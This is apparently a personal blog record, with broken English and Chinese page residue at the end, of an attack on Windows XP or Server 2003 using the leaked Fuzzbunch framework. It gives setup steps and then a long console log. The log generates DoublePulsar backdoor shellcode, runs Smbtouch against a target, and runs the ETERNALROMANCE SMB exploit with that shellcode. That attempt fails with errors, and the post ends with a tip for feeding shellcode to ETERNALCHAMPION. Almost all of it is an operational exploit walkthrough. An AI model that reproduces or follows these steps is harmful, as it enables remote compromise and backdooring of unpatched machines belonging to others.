make a record . use nsa exploit -> ETERNALROMANCE to attack winxp \ winserver2003

python 2.6.6(python-2.6.6.msi)

which can be run on the windows xp or win7,look here !!!must 32 bit system!!!

(2)unrar and use it for attack
if you run , you will get a error,than mkdir “listeningposts” under windows.than you can go go go !


--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List

  0) prompt confirm
  1) execute

Exploit Autorun List

  0) apply
  1) touch all
  2) prompt confirm
  3) execute

Special Autorun List

  0) apply
  1) touch all
  2) prompt confirm
  3) execute

Payload Autorun List

  0) apply
  1) prompt confirm
  2) execute

[+] Set FbStorage => C:\tools\shadowbroker-master\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] :
[?] Default Callback IP Address [] :
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : c:\logs
[*] Checking c:\logs for projects
Index     Project
-----     -------
0         new
1         Create a New Project

[?] Project [0] : 0
[?] Set target log directory to 'c:\logs\new\z172.16.17.150'? [Yes] :

[*] Initializing Global State
[+] Set TargetIp =>
[+] Set CallbackIp =>

[!] Redirection OFF
[+] Set LogDir => c:\logs\new\z172.16.17.150
[+] Set Project => new

fb > use do
Domaintouch  Doublepulsar
fb > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp =>

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar

Name              Value
----              -----
NetworkTimeout    60
TargetPort        445
Protocol          SMB
Architecture      x86
Function          OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] :

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] : 0

[*]  OutputFile :: Full path to the output file

[?] OutputFile [] : c:\shellcode1.bin
[+] Set OutputFile => c:\shellcode1.bin

[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [] :
[?] Destination Port [445] :
[+] (TCP) Local

[+] Configure Plugin Remote Tunnels

Module: Doublepulsar

Name              Value
----              -----
NetworkTimeout    60
TargetPort        445
OutputFile        c:\shellcode1.bin
Protocol          SMB
Architecture      x86
Function          OutputInstall

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[+] Writing Installer to disk
[*] Deleting old version of OutputFile if it exists
[*] Shellcode written to OutputFile
[+] Doublepulsar Succeeded

fb Payload (Doublepulsar) > use eter
Eternalblue     Eternalchampion Eternalromance  Eternalsynergy
fb Payload (Doublepulsar) > use Eternalromance

[!] Entering Plugin Context :: Eternalromance
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp =>

[*] Applying Session Parameters
[*] Running Exploit Touches

[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp =>

[*] Inheriting Input Variables

[!] Enter Prompt Mode :: Smbtouch

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [] :

[*]  TargetPort :: Port used by the SMB service

[?] TargetPort [445] :

[*]  Pipe :: Test an additional pipe to see if it is accessible (optional)

[?] Pipe [] :

[*]  Share :: Test a file share to see if it is accessible (optional), entered as hex bytes (in unicode)

[?] Share [] :

[*]  Protocol :: SMB (default port 445) or NBT (default port 139)

   *0) SMB
    1) NBT

[?] Protocol [0] :

[*]  Credentials :: Type of credentials to use

   *0) Anonymous     Anonymous (NULL session)
    1) Guest         Guest account
    2) Blank         User account with no password set
    3) Password      User name and password
    4) NTLM          User name and NTLM hash

[?] Credentials [0] :

[!] Preparing to Execute Smbtouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels

[+] Configure Plugin Remote Tunnels

Module: Smbtouch

Name                    Value
----                    -----
NetworkTimeout          60
TargetPort              445
UsingNbt                False
Protocol                SMB
Credentials             Anonymous

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started

[*] TargetIp    
[*] TargetPort            445
[*] RedirectedTargetIp    (null)
[*] RedirectedTargetPort  0
[*] NetworkTimeout        60
[*] Protocol              SMB
[*] Credentials           Anonymous

[*] Connecting to target...
        [+] Initiated SMB connection

[+] Target OS Version 5.1 build 2600
    Windows 5.1

[!] Target could be either SP2 or SP3,
[!] for these SMB exploits they are equivalent

[*] Trying pipes...
        [+] spoolss    - Success!

[+] Target is 32-bit

[Not Supported]
        ETERNALSYNERGY  - Target OS version not supported

        ETERNALBLUE     - DANE

[*] Writing output parameters

[+] Target is vulnerable to 3 exploits
[+] Touch completed successfully

[+] Smbtouch Succeeded

[*] Exporting Contract To Exploit
[+] Set PipeName => spoolss
[+] Set Credentials => Anonymous
[+] Set Target => XP_SP2SP3_X86

[!] Enter Prompt Mode :: Eternalromance

Module: Eternalromance

Name              Value
----              -----
NetworkTimeout    60
TargetPort        445
PipeName          spoolss
ExploitMethod     Default
Credentials       Anonymous
Protocol          SMB
Target            XP_SP2SP3_X86

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [] :

[*]  TargetPort :: Target TCP port

[?] TargetPort [445] :

[*]  PipeName :: The named pipe to use

[?] PipeName [spoolss] :

[*]  ShellcodeFile :: DOPU (ensure correct architecture) ONLY! Other shellcode will likely BSOD.

[?] ShellcodeFile [] : c:\\shellcode1.bin
[+] Set ShellcodeFile => c:\\shellcode1.bin

[*]  ExploitMethod :: Which exploit method to use

   *0) Default              Use the best exploit method(s) for the target OS
    1) Fish-in-a-barrel     Most reliable exploit method (XP/2k3 only)
    2) Matched-pairs        Next reliable exploit method (XP/Win7/2k8R2 only)
    3) Classic-Romance      Original LargePageGroom exploit method (All OS Versions)

[?] ExploitMethod [0] :

[*]  Credentials :: Type of credentials to use

   *0) Anonymous     Anonymous (NULL session)
    1) Guest         Guest account
    2) Blank         User account with no password set
    3) Password      User name and password
    4) NTLM          User name and NTLM hash

[?] Credentials [0] :

[*]  Protocol :: SMB (default port 445) or NBT (default port 139)

   *0) SMB
    1) NBT

[?] Protocol [0] :

[*]  Target :: Operating System, Service Pack, of target OS

    0) XP_SP0SP1_X86         Windows XP Sp0 and Sp1, 32-bit
   *1) XP_SP2SP3_X86         Windows XP Sp2 and Sp3, 32-bit
    2) XP_SP1_X64            Windows XP Sp1, 64-bit
    3) XP_SP2_X64            Windows XP Sp2, 64-bit
    4) SERVER_2003_SP0       Windows Sever 2003 Sp0, 32-bit
    5) SERVER_2003_SP1       Windows Sever 2003 Sp1, 32-bit/64-bit
    6) SERVER_2003_SP2       Windows Sever 2003 Sp2, 32-bit/64-bit
    7) VISTA_SP0             Windows Vista Sp0, 32-bit/64-bit
    8) VISTA_SP1             Windows Vista Sp1, 32-bit/64-bit
    9) VISTA_SP2             Windows Vista Sp2, 32-bit/64-bit
    10) SERVER_2008_SP0       Windows Server 2008 Sp0, 32-bit/64-bit
    11) SERVER_2008_SP1       Windows Server 2008 Sp1, 32-bit/64-bit
    12) SERVER_2008_SP2       Windows Server 2008 Sp2, 32-bit/64-bit
    13) WIN7_SP0              Windows 7 Sp0, 32-bit/64-bit
    14) WIN7_SP1              Windows 7 Sp1, 32-bit/64-bit
    15) SERVER_2008R2_SP0     Windows Server 2008 R2 Sp0, 32-bit/64-bit
    16) SERVER_2008R2_SP1     Windows Server 2008 R2 Sp1, 32-bit/64-bit

[?] Target [1] :

[!] Preparing to Execute Eternalromance
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [] :
[?] Destination Port [445] :
[+] (TCP) Local

[+] Configure Plugin Remote Tunnels

Module: Eternalromance

Name                   Value
----                   -----
NetworkTimeout         60
TargetPort             445
MaxExploitAttempts     3
PipeName               spoolss
ExploitMethodChoice    0
ShellcodeFile          c:\shellcode1.bin
CredChoice             0
UsingNbt               False
OsMajor                5
OsMinor                1
OsServicePack          2
ExploitMethod          Default
Credentials            Anonymous
Protocol               SMB
Target                 XP_SP2SP3_X86

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Running Exploit
[*] Initializing Parameters
        [+] Target
        [+] Authcode: 0x7f4afb0f
        [+] XorMask: 0xe9
        [+] Network Timeout: 60 seconds
[*] Attempting exploit method 1
[*] Initializing Network
        [+] Initial smb session setup completed
[*] Trying pipe spoolss...
        [+] Success!
        [+] Smb pipe and rpc setup complete
[*] Filling barrel with fish... done

<----------------| Entering Danger Zone |----------------->

        [*] Preparing dynamite...
                [*] Trying stick 1 (x86)...Miss
                [*] Trying stick 2 (x86)...Miss
                [*] Trying stick 3 (x86)...Miss
[-] Error 48 (DoRemoteApiLeak)
[-] Error 48 (RunExploitMethod1)
[*] Connections closed, exploit method 1 unsuccessful

[*] Attempting exploit method 2
[*] Initializing Network
        [+] Initial smb session setup completed
[*] Trying pipe spoolss...
        [+] Success!
        [+] Smb pipe and rpc setup complete
[*] Performing initial groom, this may take some time
        [*] Sending 36 groom packets........ done
        [*] Sending 64 bride packets....... done

<----------------| Entering Danger Zone |----------------->

[*] Invoking leak to find transaction...
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[*] Performing initial groom, this may take some time
        [*] Sending 36 groom packets........ done
        [*] Sending 64 bride packets....... done
[*] Invoking leak to find transaction...
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[*] Performing initial groom, this may take some time
        [*] Sending 36 groom packets........ done
        [*] Sending 64 bride packets....... done
[*] Invoking leak to find transaction...
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[-] Error 46 (RunExploitMethod2)
[-] Error 46 (RunPlugin)
[-] Error 46 (processParams)
[!] Plugin failed
[-] Error: Eternalromance Failed

 OK!!! its a error, i don't know why,when i first use it,sucess!gusess......
tips: if you want to use Eternalchampion
must use copy byte-shellcode as eternalchampion's payload
here is a link: 
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当前余额3.43前往充值 >
领取后你会自动成为博主和红包主的粉丝 规则
钱包余额 0


